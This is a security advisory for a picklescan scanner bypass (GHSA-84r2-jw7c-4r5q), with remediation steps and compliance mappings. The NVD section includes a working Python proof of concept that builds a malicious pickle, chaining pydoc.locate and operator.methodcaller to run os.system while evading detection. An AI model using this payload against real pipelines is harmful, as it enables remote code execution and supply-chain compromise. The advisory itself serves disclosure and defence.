GHSA-84r2-jw7c-4r5q

GHSA-84r2-jw7c-4r5q HIGH
Published December 29, 2025
CISO Take

If your ML pipelines use picklescan as a security gate for model files, that control is bypassed — attackers can craft pickle payloads that picklescan rates as Safe or Suspicious instead of Dangerous, achieving RCE on load. Patch to picklescan 0.0.33 immediately and treat any model file scanned by a prior version as unverified. This is a scanner bypass, not a model vulnerability — your security posture has a blind spot right now.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.33 0.0.33

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. 1) Upgrade picklescan to v0.0.33 immediately — this is the only complete fix. 2) Audit all pickle files scanned with versions < 0.0.33 in the past 90 days; treat them as potentially unsafe and re-scan. 3) Implement defense-in-depth: load models in sandboxed/isolated environments (Docker, VM, restricted subprocess) regardless of scan results. 4) Migrate to SafeTensors format for model distribution — eliminates pickle deserialization risk entirely. 5) Enforce model provenance: cryptographic hash verification and signed artifact attestation as a secondary control layer. 6) Detection in SIEM: alert on picklescan logs showing 'Suspicious' results for pydoc or operator modules — under prior versions these were under-flagged RCE payloads.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.9 - Risk management system
ISO 42001
A.6.2.6 - AI supply chain management
NIST AI RMF
MANAGE-2.2 - Mechanisms are in place and applied to sustain risk management controls
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Technical Details

NVD Description

### Summary Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly * pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module). * operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system. Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicious file to bypass the security check. ### PoC use the provided script to create a malicious pickle file ```python import pickle import pydoc import operator import os class ModuleLocator: def __init__(self, module_name): self.module_name = module_name def __reduce__(self): return (pydoc.locate, (self.module_name,)) class RCEPayload: def __reduce__(self): cmd = "notepad" #put your payload here mc = operator.methodcaller("system", cmd) return (mc, (ModuleLocator("os"),)) def generate_exploit(): payload = RCEPayload() try: with open("bypass.pkl", "wb") as f: f.write(pickle.dumps(payload)) print("File 'bypass.pkl' created.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": generate_exploit() ``` The generated payload will not be flagged as dangerous by picklescan but is actually malicious. ```python import pickle print("Loading bypass.pkl...") pickle.load(open("bypass.pkl", "rb")) ``` Script to open the pickle file, demonstrating impact <img width="746" height="341" alt="image" src="https://github.com/user-attachments/assets/2be1b8f9-d467-408d-b1cf-d40b49100cf0" /> ### Remediation The deny-list for these modules must be upgraded from specific functions to a wildcard (*), indicating that any use of these modules is dangerous.

Exploitation Scenario

Attacker targets an organization with an automated MLOps pipeline that pulls pre-trained models from a public registry and scans them with picklescan before loading. The attacker publishes a malicious model to Hugging Face or injects into an internal registry, embedding a pydoc.locate + operator.methodcaller payload that resolves os.system and executes a reverse shell. picklescan v< 0.0.33 rates the file as Safe. The CI/CD pipeline loads the model into the training cluster. The attacker now has RCE on GPU infrastructure with access to proprietary model weights, training data, and the ability to inject backdoors into production models before they are deployed.

Timeline

Published
December 29, 2025
Last Modified
December 29, 2025
First Seen
March 24, 2026